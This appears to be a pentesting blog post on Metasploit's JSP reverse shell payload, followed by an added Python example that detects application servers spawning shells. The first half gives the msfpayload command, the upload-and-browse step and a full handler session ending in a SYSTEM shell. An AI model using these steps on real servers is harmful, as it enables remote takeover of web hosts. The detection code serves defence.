Stephen Fewer has pushed up a JSP reverse shell and a JSP bind shell.
http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java
I'm not sure of all the ways to use them, but the easiest way is to just output the shell to raw and upload it to a web server. For an example with an exploit, check out the Adobe RoboHelp exploit.
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb
yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp
From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.
yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 222 aux
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info
Name: Generic Payload Handler
Version: 6558
Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
Privileged: No
License: Metasploit Framework License (BSD)
Provided by:
hdm
Available targets:
Id Name
-- ----
0 Wildcard Target
Payload information:
Space: 100000
Avoid: 0 characters
Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\ColdFusion8\runtime\bin>
whoami
nt authority\system
C:\ColdFusion8\runtime\bin>
exit
[*] Command shell session 1 closed.
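
On the server side, the session above shows up as the application server's JVM starting cmd.exe, here as SYSTEM. The following is an added detection example, not part of the original post or of Metasploit: it flags that parent/child pattern in process-creation events, and it generalizes beyond ColdFusion to other JSP containers and shells. The event layout, process-name lists and sample rows are assumptions constructed for illustration.

```python
import csv
import io
import ntpath

# Assumption: image names of Java application servers that host JSP pages.
# jrun.exe is the ColdFusion 8 runtime; the rest are common JSP containers.
JSP_HOSTS = {"jrun.exe", "java.exe", "javaw.exe", "tomcat6.exe"}
# Assumption: shells the payload's SHELL option may name (cmd.exe in the post).
SHELLS = {"cmd.exe", "powershell.exe", "sh", "bash"}

# Constructed process-creation events (Sysmon Event ID 1 style fields as CSV).
SAMPLE_EVENTS = r"""
time,host,user,parent_image,image
10:02:11,CF01,NT AUTHORITY\SYSTEM,C:\ColdFusion8\runtime\bin\jrun.exe,C:\WINDOWS\system32\cmd.exe
10:02:40,CF01,CF01\admin,C:\WINDOWS\explorer.exe,C:\WINDOWS\system32\cmd.exe
10:03:05,CF01,NT AUTHORITY\SYSTEM,C:\ColdFusion8\runtime\bin\jrun.exe,C:\ColdFusion8\runtime\jre\bin\java.exe
10:04:17,APP02,APP02\tomcat,C:\Tomcat6\bin\tomcat6.exe,C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
""".strip()


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return ntpath.basename(path.replace("/", "\\")).lower()


def find_jsp_shell_spawns(csv_text):
    """Return events where a JSP-hosting process started a system shell."""
    alerts = []
    for ev in csv.DictReader(io.StringIO(csv_text)):
        parent, child = basename(ev["parent_image"]), basename(ev["image"])
        if parent in JSP_HOSTS and child in SHELLS:
            # A shell running as SYSTEM means the app server is over-privileged.
            privileged = ev["user"].upper() in ("NT AUTHORITY\\SYSTEM", "ROOT")
            alerts.append({"time": ev["time"], "host": ev["host"],
                           "parent": parent, "shell": child,
                           "severity": "critical" if privileged else "high"})
    return alerts


if __name__ == "__main__":
    for alert in find_jsp_shell_spawns(SAMPLE_EVENTS):
        print(alert)
```

Some applications legitimately shell out (for example ColdFusion's cfexecute tag), so baseline each server before alerting. Running the application server under a low-privilege service account keeps a shell like this from landing as SYSTEM.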




